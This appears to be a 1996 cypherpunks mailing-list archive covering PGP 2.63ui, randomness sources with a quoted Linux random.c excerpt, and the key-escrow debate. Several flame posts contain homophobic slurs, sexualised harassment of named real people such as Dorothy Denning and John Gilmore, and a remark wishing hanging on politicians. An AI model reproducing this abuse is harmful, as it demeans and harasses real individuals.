| As I mentioned a couple of days ago, science fiction writer David Brin
| has an argument against not only anonymity, but _privacy_ as well.
| Where cypherpunks tend to think of privacy as both beneficial and
| inevitable, Brin sees it as harmful and doomed.  He has an article in
| the December 1996 issue of Wired discussing his ideas.
| 
| BTW cypherpunk Doug Barnes is also quoted several times in the long
| article in that issue by Neal Stephenson (Snow Crash, The Diamond Age)
| about the undersea cables that carry most transnational information
| traffic.
| 
| Hal
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Crompton <sunray@globalnet.co.uk>
Date: Thu, 28 Nov 1996 04:08:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: re:PGP263UI
Message-ID: <1.5.4.16.19961128120853.1a1fe4ba@mail.globalnet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Back posted re PGP 2.63ui

>I was under the impression that with the Legal_Kludge option for
>pgp263i, that it already was compatible with old versions of pgp using
>the version byte of 2.

We kept the control structure of the original ui version by "Matthew".
But the compatibility of 2.63ui has been expanded to allow it
to Export public keys generated with Version=3 (Legal_Kludge=on)
to old versions (2.3a) of PGP.

>What else does pgp263ui offer? The GNU license? What about pgp3?
>Some people aren't going to be very happy if you do a GNU version of
>that, as GNU doesn't preclude selling commercially provided that
>source is provided.

See the original announcement for the numerous fixes & enhancements
not currently available in 2.6.2 or 2.6.3ia including

Added CONFIG.TXT parameters/functions LabelEncrypt and PrePendSigV
Expanded disk write error checking
Ability to edit other people's keys's UserID's.

We have no current plans re PGP 3.0. Probably a GNU version of it
is not legally possible. But if source is released independent
enhancements would be, depending on the license.

It also remains to be seen if or how fast PGP 3.0, if it ever
comes, will supplant previous versions of PGP in public
acceptance.


>PS Steve and friends: I've got some stealth code close to usable in
>the form of a patch to pgp263 if you want it :-)

Yes. Please send me a copy and we'll take a look at it. But the
external stealth utility currently available is quite adequate in
my view.

Steve Crompton <sunray@globalnet.co.uk>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Requires PGP version 2.6 or later.

iQEVAwUBMp11UxRHWQsRmI2RAQE/EggAwtnT312Wmi7dWn4sYK/GxVJDqbKpuGuh
yVekVPRsrBRQlhcQqm1ICzucGMOd+uDNTNqoxx82tBzjAphN2adANayin3I7FpW1
mkvdCj77pzkEwqc60OcPjqRg5q9xKsPCczAmaHBVmuyKjCDJemEzLMUQsrllohha
c3v4WcRgB+epnDpF0hpdDYH7aiIo/FmN59ItcMEvrytkt5Hv7GjZq974UC/1ALik
sFsML7QWp6bpVNzDeE8H7FmrT7kKVBddQwQcwFP2dPHOaFdqMRPjVcIxxjiOs5/o
I3sCaH8L5VAF/WivcRCvYOBV+kklbTQsJIdt/eTrCGtTpoWtjVhyyw==
=VPSl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Crompton <sunray@globalnet.co.uk>
Date: Thu, 28 Nov 1996 04:10:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:PGP263UI
Message-ID: <1.5.4.16.19961128120855.1a1f3dd8@mail.globalnet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mark M. (markm@voicenet.com) wrote on
  Sat, 23 Nov 1996 22:24:41 -0500 (EST)

>...

>> Note that I personally have not done very much of the actual coding on
>> this version. However if bugs are reported or constructive
>> suggestions for improvements made I will pass them on to the
>> individual(s) who have done the bulk of the work to make this release
>> possible. I am assured that continuing support will be provided.

>I found two bugs so far:
>
>This version doesn't recognize either .pgprc or pgp.ini as valid
>config file names.  It is very minor, but this functionality is
>stated in the manual.

I couldn't find any mention of either filename in -our- docs.
Please point out the reference if I missed it. I think this was
an MIT "feature". I don't plan to copy it.

>One of my favorite options, +makerandom, isn't supported in this
>version.  This is an undocumented option, but it is useful in
>many situations.

Not as useful as you might think. A bug has been reported in the
MIT version that +makerandom produces -weak- pseudo-random
output, as (I am told) can be verified by just generating a large
"random" file and viewing it with a hex viewer, looking for
regular patterns. I don't know if this was ever fixed in Stale's
version. This bug does not produce a weakness in the normal
functions of MIT or Stale's PGP.

MIT heavily rewrote the random number functions for their
versions of PGP and the +makerandom feature depends on this
rewrite. I did not want to try to import "mass quantities" of
code from MIT both to respect their copyright and to maintain to
some degree the independence of the MIT-derived and 2.3a-derived
versions to that a bug in one might not be reproduced in the
other.

For Random numbers up to 24 bytes (192 bits), just use a -copy-
of RANDSEED.BIN.

For a longer random file, just encrypt (either RSA or
conventional IDEA) a file a little longer than the file desired.
Throw away a few hundred bytes from the start and end. The result
will be just as strongly random as +makerandom even without the
current bug.

>This version uses +version_byte instead of +Legal_Kludge, but I
>consider that a feature.  I haven't had time to experiment with
>the "Charset:"  header.  One other minor problem is that
>ClearSig doesn't default to "on".  This could cause some
>frustration with new users.

I haven't tried to imlpement the "Charset" header and probably
won't. If this feature is important to you, use Stale's version.
I will look into this for the next version, but no promises.

Clearsig is working correctly as we document it. Another MIT
change. It would be more work to change the documentation than
the code, but I will consider this for the next release.

>Other then that, it's just fine.

Thanks for your constructive criticism and comments.


Steve Crompton 100645.1716@compuserve.com (preferred)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Requires PGP version 2.6 or later.

iQEVAwUBMp14FhRHWQsRmI2RAQHndggAgNdcOqya2NPX+8KOkoj1qoYnGBRprREK
t0l3sK2HHqUQwTwKSkW5ugD898kG26HjCVlMsqfgQVcw+3nAhZgU/t7MCU9/orD8
yUc9vtXr/C4lLJHTtDGVpjPfRAJpV0m0myDwoqXZo4gTrkoQG43mKaE4eLv9qcl4
zGv4fMv/lh7hUwfUsZ6c7ULGPfKeYtknO1Hh3gKYX6HJPz5Qki2toIdH8qxpw51v
CC/Q/MLxLQUGYH/jdHqvUSSD0G1QIu/D/LlL9VaUtPJemqPOuBGmk+ywvE7AAfNG
uEnO/AumU3j1yPnFXqv5pUKGxP1gKbMyKR8lrEwWcrDapaiC6mW4oQ==
=qk2B
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pavel Korensky <pavelk@dator3.anet.cz>
Date: Thu, 28 Nov 1996 03:25:30 -0800 (PST)
To: adam@homeport.org
Subject: Re[2]: Sound card as a random number source ??
In-Reply-To: <199611272052.PAA17382@homeport.org>
Message-ID: <199611281123.MAA00250@zenith.dator3.anet.cz>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> wrote:
> Have you tried it without a mike plugged in?
> Always think about failure modes.
> 
> Adam
> 

But there always can be some kind of test, like presampling and testing if the
input is not dead. 
And of course some kind of hash algorithm must be applied to the sampled stream
(MD5 ?).

Bye PavelK


--
****************************************************************************
*                    Pavel Korensky (pavelk@dator3.anet.cz)                *
*     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
*  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
****************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 28 Nov 1996 11:04:12 -0800 (PST)
To: devnull@manifold.algebra.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <c6X4XD15w165w@bwalk.dm.com>
Message-ID: <199611281834.MAA00656@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> 
> Why do you think I don't discuss my work on this mailing list?
> 

Lemme take a guess, there is probably a good number of people
who have a genuine interest as to where you work.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 28 Nov 1996 09:40:38 -0800 (PST)
To: Clay Olbon II <olbon@ix.netcom.com>
Subject: RE: IQ and age
Message-ID: <9610288492.AA849213618@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Clay Olbon II <olbon@ix.netcom.com> wrote:
>Seriously, you ignore the correlation between performance in college and
standardized test scores.  There is a reason these are used in admissions - they
are actually pretty good predictors of the ability to perform college level
work. <
 
This is a commonly held fiction that is not supported by the evidence. As stated
in another message, the infomration given out by ETS, who administer the GMAT
and SAT, indicate that there is a low correlation between GMAT scores and
successful completion of even first year education programs. This also ignores
the issue of why other, better, widely available predictors are not used
instead.
 
>Oh, I forgot.  Only certain racial/ethnic groups are capable of understanding
basic mathematical concepts. <
 
There was a good Scientific American article on cultural influences on learning
within the last year or two. It examined Asian groups noted achievements in
tests and the parental and cultural support for scholastic achievement.
 
Another anecdotal example is in the opening chapters of "Surely You're Joking,
Mr. Feynman" by Richard Feynman, the late Caltech professor and general bon
vivant. He describes how his mother introduced a doctor, a general and a
professor with the same respectful tones indicating to him that a career in
academia was as highly valued as any other high position in society.
 
>I happen to feel better believing in the potential for any individual in this
country to succeed through hard work. <
 
I do to. But how good are your feelings as predictors of actual success?
 
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Thu, 28 Nov 1996 10:08:42 -0800 (PST)
To: jbugden@smtplink.alis.ca
Subject: RE: IQ and age
Message-ID: <1.5.4.32.19961128180712.006ec3ec@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 PM 11/28/96 EST, jbugden@smtplink.alis.ca wrote:
>Clay Olbon II <olbon@ix.netcom.com> wrote:
>>Seriously, you ignore the correlation between performance in college and
>standardized test scores.  There is a reason these are used in admissions -
they
>are actually pretty good predictors of the ability to perform college level
>work. <
> 
>This is a commonly held fiction that is not supported by the evidence. As
stated
>in another message, the infomration given out by ETS, who administer the GMAT
>and SAT, indicate that there is a low correlation between GMAT scores and
>successful completion of even first year education programs. This also ignores
>the issue of why other, better, widely available predictors are not used
>instead.

Apples and oranges.  I was referring to the correlation of college GPA to
SAT scores (which is higher than the correlation between high school GPA and
college GPA).  GPA measures the ability to do college-level work.  As such,
SAT scores are very relevant.  As you said, <completion> of college probably
does involve lots of other factors. I would not expect a high correlation
between standardized test scores and completion rates.

> 
>>Oh, I forgot.  Only certain racial/ethnic groups are capable of understanding
>basic mathematical concepts. <
> 
>There was a good Scientific American article on cultural influences on learning
>within the last year or two. It examined Asian groups noted achievements in
>tests and the parental and cultural support for scholastic achievement.

My point exactly.  It is these cultural factors, not the amount of money the
parents make, that is really the important aspect.  It does seem unfortunate
however that in many lower income families, there is less of an emphasis on
scholastic achievement.  

>Another anecdotal example is in the opening chapters of "Surely You're Joking,
>Mr. Feynman" by Richard Feynman, the late Caltech professor and general bon
>vivant. He describes how his mother introduced a doctor, a general and a
>professor with the same respectful tones indicating to him that a career in
>academia was as highly valued as any other high position in society.
> 
>>I happen to feel better believing in the potential for any individual in this
>country to succeed through hard work. <
> 
>I do to. But how good are your feelings as predictors of actual success?

Anecdotal evidence, but I have known people at many levels of society.  I
have never met anyone who "works hard" that is in dire straits.  Some have
struggled for a time (I know I did!), but eventually the hard work paid off.

        Clay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kathleen M. Ellis" <tgkelli@tiger.towson.edu>
Date: Thu, 28 Nov 1996 10:45:20 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
In-Reply-To: <Pine.LNX.3.95.961128063650.24234B-100000@dhp.com>
Message-ID: <Pine.SGI.3.93.961128125719.27120A-100000@tiger.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Nov 1996, aga wrote:

<Ignoring the blatant stupidity, foolish Gilmore- and Denning-baiting and
other general irrelevancies from "aga", William Geiger, and the "Huge
Cojones Remailer" posts>

> Please define "GAK" and leave the headers intact.
> 
> -a

GAK - An acronym coined by cryptographer Carl Ellison (presently employed
by Cybercash) which stands for Government Access to Keys.  It's a
standardized term we (we = folks who are actually interested in the study
of cryptography and the development of public policy surrounding it) use
in the face of constantly changing government terms for what (to us) 
translates to being exactly the same (unacceptable) policy (Key Escrow,
Key Recovery and the various phases of the Clipper development). 

A brief word on abuse... by calling Gilmore or anybody else a "faggot"
doesn't win me over to your cause, as is the case with many others on the
cypherpunks list.  Further, while I may not agree with Dr. Denning's
perspective on these issues, I respect her as a writer, a cryptographer,
and as a computer scientist.  I also (groan if you must)  admire her as a
woman who has maintained such a high-profile position in such a religious
debate, given that she probably gets mail like yours all the time. 


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Semi-Carless Kathleen Ellis    NEW ADDRESS: tgkelli@tiger.towson.edu
I hate the web.			       http://tiger.towson.edu/~tgkelli/
I love encryption.    1996/08/30 Kathleen Ellis <kelli@tiger.towson.edu> 
pub  2047/21853015     F8 D6 96 B2 C6 5A 08 15  43 BE 9E CF 18 8F 1B F0

"Someone tried to get me to run nachos on my box once.  Said it was better
than sunos, more cheese".
						-r4j00g4





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 28 Nov 1996 11:30:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <BR14XD16w165w@bwalk.dm.com>
Message-ID: <199611282045.OAA12565@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <BR14XD16w165w@bwalk.dm.com>, on 11/28/96 
   at 10:26 AM, dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) said:

>"William H. Geiger III" <whgiii@amaranth.com> writes:
>> <sigh> GAK - Government Access to Keys and corporate control of encryption pr
>> keys are two completely different issues. This is just more smoke and mirrors
>> confuse the issue. There are many solutions currently available for a company
>> the encryption of their data including the use of "master keys" to prevent da
>> option available even with PGP). Government mandated infrastructure of GAK is
>> and unwarranted for such purposes.

>Surely someone who can't learn to format their text to 80 columns
>(perhaps because he uses a dead operating system) has no credibility when
>he speaks of technical things he clearly knows nothing about.

Are you incapable of turning on the word-wrap on your editor??

>You remind me of a student in my C++ class who just couldn't understand
>why a certain C expression evaluated to what it did. We made it simpler
>and simpler until we had no variables left and this expression (w/o
>parens) on the board:
>                                   1+1*2
>The student forcefully argued that it should be equal to 4.

Well seems to be a lack in your teaching ability if you are unable to
teach a collage student basic arithmatic order of operations.

>> Cooking With Warp 4.0

>Another sign of cluelessness. OS/2 is dead. I've beein using OS/2 since v
>1.0, but now I'm moving to NT 4.0. I need to find the device drivers for
>all my hardware.

hmmm... Ahhh and NT is better??

>Choke on your turkey. :-)

hmmm... no responce to the actual issue?? What's wrong Dimitri ? Only
capable of your enless rants? 

<sigh> back to the twit filter you go.

-- 
-----------------------------------------------------------
"William H. Geiger III" <whgiii@amaranth.com>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 28 Nov 1996 12:30:18 -0800 (PST)
Subject: Re: Dorthy Denning is a boot-licking fasicist!!!
Message-ID: <199611282030.OAA25514@mailhost.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 1996, Huge Cajones Remailer wrote:

> "William H. Geiger III" <whgiii@amaranth.com> writes:
> 
> >I don't know if anyone watched the House Subcomitty on Computers &
> >Technology today on C-Span.
> 
> No, we watched 'Dorothy does Georgetown" on C-Spam.
> 
> >Phil Zimmerman, Dorthy Denning, William Reinsch & others were disscussing
> >computer security.
> >
> >Dorthy Denning gave the most pro-government speech I have ever heard. Is
> >this clueless bitch on the government payroll?!!
> 
> Yes.
> 
> >William Reinsch is a lying bastard. Fucking politions!! Fucking
> >goverment!! They all deserve a long rope!!
> 
> Start with Socks the queer cat.
> 
> >Phil Zimmerman was quite good at attacking the government policies.
> >
> ><sigh> We are truly a country of fools to have put these jackbooted
> >facisit bastards back into office.
> 

Don't worry about it.  Doctress Neutopia can suck Bill's dick,
and all will be fine. {;-)-~

> "Dorothy Denning" is a man in drag. "She" has a bigger dick that
> "her" boyfriend John Gilmore, the cocksucker faggot from EFF.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Is that cocksucker AC/DC or what?
Is it true that him and John Perry Barlow do 69 on video?                                   
> 
> >-----------------------------------------------------------
> >"William H. Geiger III" <whgiii@amaranth.com>
> >-----------------------------------------------------------
> 
> Just say GAK to chicks with dicks!
> 
> diGriz
> 

Please define "GAK" and leave the headers intact.

-a







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Nov 1996 11:50:32 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: TIA Invites
Message-ID: <1.5.4.32.19961128194743.006709a8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:

>Did they say what they were investigating?  Usually, talking
>to the unworthy is not a crime.  :)


The TIA rep asked if I knew TR45.3 is ITAR-ed.

The document has such a notice, I answered.

TIA said, we've told the Feds it's on your Web site.

But why tell me, I asked.

Thought you'd like to know we told the Feds, TIA said.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 12:42:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Israel crypto restrictions
In-Reply-To: <Pine.GSO.3.95.961128160804.11147C-100000@nebula>
Message-ID: <R0D5XD19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jyri Kaljundi <jk@stallion.ee> writes:
> > > 	They're listed on NASDAQ (CKP).  This makes them an American
> > > company for purposes of export controls.  (This from an employee of
> > > Checkpoint who I asked that exact question.)
> >
> > This is truly bizarre. First, if they were on the NASDAQ, they'd have a
> > 4-letter ticker symbol, not a 3-letter symbol. MSFT (Microsoft) is on NASDA
> > IBM (IBM) and F (Ford) are on the New York stock exchange and/or
> > American stock exchange.
>
> The actual ticker symbol for Check Point Software Technologies Ltd. is
> CHKPF.

Scitex is an Israeli company run by Shamirs. Their ticker symbol is SCIXF.
They make the best high-end color printers in the world.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 12:40:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: More anonymous hate mail from John Gilmore, Timmy May, and friends
In-Reply-To: <199611281623.JAA03709@zifi.genetics.utah.edu>
Message-ID: <Lee5XD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've received the following e-mail from an anonymous coward. It didn't
have any carriage returns (I added them).

>Date: Thu, 28 Nov 1996 09:23:00 -0700
>Message-Id: <199611281623.JAA03709@zifi.genetics.utah.edu>
>To: dlv@bwalk.dm.com
>From: nobody@zifi.genetics.utah.edu (Anonymous)
>Comments: Please report misuse of this automated remailing service to <complaints@zifi.genetics.utah.edu>
>Subject: Yo, Kook! Read this.
>
>...
>
>>"Phillip M. Hallam-Baker" <hallam@ai.mit.edu> writes:
>>> Actually the opposite is the case, he is a notorious womanizer.
>>
>>Are _you gay, Phil?
>
>Look, Kook. Can you at least wait 24 hours after complaining about eliptic
>curves being somehow off-topic (as I recall, it was 50k rants about Armenian
>genocide that got your dumb ass booted) before posting your own off-topic
>sewage? Who gives a flying fuck who is or isn't gay or perverted or whatever
>in their private lives? What does it have to do with crypto, or proficiency
>in programming, or anything that matters to most of the list? It seems to me
>that you should try casting your "pearls" before the much more "noble"
>animals of the freedom-knights, who (as opposed to me) _DO_ care who is or
>isn't homosexual. Get back on your meds, it'll do you (and the list) good.
>
>me

One of the meanings of "punk" is "young homosexual". There are a lot of them
on the "cypherpunks" mailing list, trying to be social and to make friends.

They think that the "cypher" part is "kewl" and even rant about it, without
understanding the meanings of the technical terms they use (like the
recurrent rant about brute-force attacks on one-time pads). But they don't
know much about cryptography, so when someone, e.g., tries to talk about
elliptic curves, the "punk" crowd screams that it's "off-topic".

Today is Thanksgiving, so I hope you choke on your turkey (or whatever else
ends up in your mouth :-). I'm thankful that I wasn't born in this country,
because Americans are so stupid.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 28 Nov 1996 07:34:20 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Is /dev/random good enough to generate one-time pads?
In-Reply-To: <199611280345.VAA22700@algebra>
Message-ID: <Pine.LNX.3.94.961128152339.1435A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 27 Nov 1996, Igor Chudov @ home wrote:

> Subj sez it all.
> 
> Thank you.
> 
> 	- Igor.

Yes, as a matter of fact it is.  /dev/random is based on an entropy pool
taken from hardware interrupts and such, thus is a RNG, not a PRNG (thats
right IPG, Linux uses hardware to get random numbers... imagine that!).
/dev/urandom is, however, a PRNG...

Below is the doc that comes with the linux source, if you want more
info... (this was taken from my /usr/src/linux/drivers/char/random.c, the
code _would be_ at the end, but i think 1200 lines of C might be a bit
excessive to answer your question)

- ----BEGIN random.c EXCERPT-----
/*
 * random.c -- A strong random number generator
 *
 * Version 1.00, last modified 26-May-96
 * 
 * Copyright Theodore Ts'o, 1994, 1995, 1996.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, and the entire permission notice in its entirety,
 *    including the disclaimer of warranties.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 * 
 * ALTERNATIVELY, this product may be distributed under the terms of
 * the GNU Public License, in which case the provisions of the GPL are
 * required INSTEAD OF the above restrictions.  (This clause is
 * necessary due to a potential bad interaction between the GPL and
 * the restrictions contained in a BSD-style copyright.)
 * 
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * (now, with legal B.S. out of the way.....) 
 * 
 * This routine gathers environmental noise from device drivers, etc.,
 * and returns good random numbers, suitable for cryptographic use.
 * Besides the obvious cryptographic uses, these numbers are also good
 * for seeding TCP sequence numbers, and other places where it is
 * desirable to have numbers which are not only random, but hard to
 * predict by an attacker.
 *
 * Theory of operation
 * ===================
 * 
 * Computers are very predictable devices.  Hence it is extremely hard
 * to produce truly random numbers on a computer --- as opposed to
 * pseudo-random numbers, which can easily generated by using a
 * algorithm.  Unfortunately, it is very easy for attackers to guess
 * the sequence of pseudo-random number generators, and for some
 * applications this is not acceptable.  So instead, we must try to
 * gather "environmental noise" from the computer's environment, which
 * must be hard for outside attackers to observe, and use that to
 * generate random numbers.  In a Unix environment, this is best done
 * from inside the kernel.
 * 
 * Sources of randomness from the environment include inter-keyboard
 * timings, inter-interrupt timings from some interrupts, and other
 * events which are both (a) non-deterministic and (b) hard for an
 * outside observer to measure.  Randomness from these sources are
 * added to an "entropy pool", which is mixed using a CRC-like function.
 * This is not cryptographically strong, but it is adequate assuming
 * the randomness is not chosen maliciously, and it is fast enough that
 * the overhead of doing it on every interrupt is very reasonable.
 * As random bytes are mixed into the entropy pool, the routines keep
 * an *estimate* of how many bits of randomness have been stored into
 * the random number generator's internal state.
 * 
 * When random bytes are desired, they are obtained by taking the MD5
 * hash of the contents of the "entropy pool".  The MD5 hash avoids
 * exposing the internal state of the entropy pool.  It is believed to
 * be computationally infeasible to derive any useful information
 * about the input of MD5 from its output.  Even if it is possible to
 * analyze MD5 in some clever way, as long as the amount of data
 * returned from the generator is less than the inherent entropy in
 * the pool, the output data is totally unpredictable.  For this
 * reason, the routine decreases its internal estimate of how many
 * bits of "true randomness" are contained in the entropy pool as it
 * outputs random numbers.
 * 
 * If this estimate goes to zero, the routine can still generate
 * random numbers; however, an attacker may (at least in theory) be
 * able to infer the future output of the generator from prior
 * outputs.  This requires successful cryptanalysis of MD5, which is
 * not believed to be feasible, but there is a remote possibility.
 * Nonetheless, these numbers should be useful for the vast majority
 * of purposes.
 * 
 * Exported interfaces ---- output
 * ===============================
 * 
 * There are three exported interfaces; the first is one designed to
 * be used from within the kernel:
 *
 * 	void get_random_bytes(void *buf, int nbytes);
 *
 * This interface will return the requested number of random bytes,
 * and place it in the requested buffer.
 * 
 * The two other interfaces are two character devices /dev/random and
 * /dev/urandom.  /dev/random is suitable for use when very high
 * quality randomness is desired (for example, for key generation or
 * one-time pads), as it will only return a maximum of the number of
 * bits of randomness (as estimated by the random number generator)
 * contained in the entropy pool.
 * 
 * The /dev/urandom device does not have this limit, and will return
 * as many bytes as are requested.  As more and more random bytes are
 * requested without giving time for the entropy pool to recharge,
 * this will result in random numbers that are merely cryptographically
 * strong.  For many applications, however, this is acceptable.
 *
 * Exported interfaces ---- input
 * ==============================
 * 
 * The current exported interfaces for gathering environmental noise
 * from the devices are:
 * 
 * 	void add_keyboard_randomness(unsigned char scancode);
 * 	void add_mouse_randomness(__u32 mouse_data);
 * 	void add_interrupt_randomness(int irq);
 * 	void add_blkdev_randomness(int irq);
 * 
 * add_keyboard_randomness() uses the inter-keypress timing, as well as the
 * scancode as random inputs into the "entropy pool".
 * 
 * add_mouse_randomness() uses the mouse interrupt timing, as well as
 * the reported position of the mouse from the hardware.
 *
 * add_interrupt_randomness() uses the inter-interrupt timing as random
 * inputs to the entropy pool.  Note that not all interrupts are good
 * sources of randomness!  For example, the timer interrupts is not a
 * good choice, because the periodicity of the interrupts is to
 * regular, and hence predictable to an attacker.  Disk interrupts are
 * a better measure, since the timing of the disk interrupts are more
 * unpredictable.
 * 
 * add_blkdev_randomness() times the finishing time of block requests.
 * 
 * All of these routines try to estimate how many bits of randomness a
 * particular randomness source.  They do this by keeping track of the
 * first and second order deltas of the event timings.
 *
 * Ensuring unpredictability at system startup
 * ============================================
 * 
 * When any operating system starts up, it will go through a sequence
 * of actions that are fairly predictable by an adversary, especially
 * if the start-up does not involve interaction with a human operator.
 * This reduces the actual number of bits of unpredictability in the
 * entropy pool below the value in entropy_count.  In order to
 * counteract this effect, it helps to carry information in the
 * entropy pool across shut-downs and start-ups.  To do this, put the
 * following lines an appropriate script which is run during the boot
 * sequence: 
 *
 *	echo "Initializing random number generator..."
 *	# Carry a random seed from start-up to start-up
 *	# Load and then save 512 bytes, which is the size of the entropy pool
 * 	if [ -f /etc/random-seed ]; then
 *		cat /etc/random-seed >/dev/urandom
 * 	fi
 *	dd if=/dev/urandom of=/etc/random-seed count=1
 *
 * and the following lines in an appropriate script which is run as
 * the system is shutdown:
 * 
 *	# Carry a random seed from shut-down to start-up
 *	# Save 512 bytes, which is the size of the entropy pool
 *	echo "Saving random seed..."
 *	dd if=/dev/urandom of=/etc/random-seed count=1
 * 
 * For example, on many Linux systems, the appropriate scripts are
 * usually /etc/rc.d/rc.local and /etc/rc.d/rc.0, respectively.
 * 
 * Effectively, these commands cause the contents of the entropy pool
 * to be saved at shut-down time and reloaded into the entropy pool at
 * start-up.  (The 'dd' in the addition to the bootup script is to
 * make sure that /etc/random-seed is different for every start-up,
 * even if the system crashes without executing rc.0.)  Even with
 * complete knowledge of the start-up activities, predicting the state
 * of the entropy pool requires knowledge of the previous history of
 * the system.
 *
 * Configuring the /dev/random driver under Linux
 * ==============================================
 *
 * The /dev/random driver under Linux uses minor numbers 8 and 9 of
 * the /dev/mem major number (#1).  So if your system does not have
 * /dev/random and /dev/urandom created already, they can be created
 * by using the commands:
 *
 * 	mknod /dev/random c 1 8
 * 	mknod /dev/urandom c 1 9
 * 
 * Acknowledgements:
 * =================
 *
 * Ideas for constructing this random number generator were derived
 * from the Pretty Good Privacy's random number generator, and from
 * private discussions with Phil Karn.  Colin Plumb provided a faster
 * random number generator, which speed up the mixing function of the
 * entropy pool, taken from PGP 3.0 (under development).  It has since
 * been modified by myself to provide better mixing in the case where
 * the input values to add_entropy_word() are mostly small numbers.
 * Dale Worley has also contributed many useful ideas and suggestions
 * to improve this driver.
 * 
 * Any flaws in the design are solely my responsibility, and should
 * not be attributed to the Phil, Colin, or any of authors of PGP.
 * 
 * The code for MD5 transform was taken from Colin Plumb's
 * implementation, which has been placed in the public domain.  The
 * MD5 cryptographic checksum was devised by Ronald Rivest, and is
 * documented in RFC 1321, "The MD5 Message Digest Algorithm".
 * 
